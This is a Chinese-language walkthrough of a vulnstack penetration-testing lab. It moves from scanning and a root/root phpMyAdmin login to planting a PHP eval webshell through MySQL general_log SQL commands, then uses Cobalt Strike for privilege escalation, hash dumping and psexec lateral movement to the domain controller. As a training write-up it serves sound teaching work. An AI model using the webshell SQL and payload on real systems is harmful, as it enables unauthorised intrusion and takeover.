简介#
靶场来自:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
简单的一个靶场,本来用作学生的考核的,但是没用到,横向的域渗透也只是用了 cobalt strike 上的 psexec 模块,主要的内容是熟悉一些渗透的流程。
靶场有很多漏洞都没法复现成功,环境会有一些问题,但整体的流程没问题。
环境搭建#
需要关闭加速 3D 图形,不然无法启动虚拟机
拓扑图如下:
网络设置如下,用到 VMnet2 和 VMnet8:
web 服务器(VM1) - win7(双网卡,NAT 模式 + vmnet2(host-only))
ip:192.168.111.128 和 192.168.52.143
开启 phpstudy
DNS 指向 DC
win2008 DC(VM3)
ip:192.168.52.138
win03 域成员(vm2)
ip:192.168.52.141
查看当前的域
渗透过程#
信息收集#
nmap 端口扫描#
御剑扫描#
目录扫描#
phpinfo 页面
phpmyadmin 登录#
若密码:root/root
phpmyadmin getshell#
通过日志 getshell
查看日志是否开启记录及日志存储位置:SHOW VARIABLES LIKE "general_log%";
开启日志:set global general_log='on';
查询是否开启:SHOW VARIABLES LIKE "general_log%"
设置写入的日志文件为恶意文件,需要先找到网站目录
设置日志路径:set global general_log_file ='C:\\phpStudy\\WWW\\s.php';
设置成功
准备工作好后,开始写马。只需要通过 sql 语句查询即可
select "<?php @eval($_POST[cmd]);?>";
访问 webshell:
http://192.168.111.128/ss.php
蚁剑连接:
网站的 80 端口是 yxcms
登录后台,一样可以执行 sql 语句
webshell 查看 ip 地址
发现双网卡
cs 启动#
上线到 cobalt strike 上操作
服务端
客户端
建立监听
生成 payload
payload 上传至蚁剑执行
运行 exe,cs 上线
sleep 0
shell whoami
提权#
cs 上用 getsystem 一键提权,获取 system 权限
内网信息收集#
点击 target 发现三台机器,如果点开没有,端口扫描一下就有了
dumphash
获取明文密码
横向移动#
获取到密码后,通过 psexec 横向移动,这里主要是三台机器的密码都是一样的,如果不一样,就无法通过 smb 横向移动了。
选择 psexec64,64 位
获取域控服务器
同样的方式控制 141,win2003 那台域成员机器
需要选择 psexec,32 位
查看下 ip
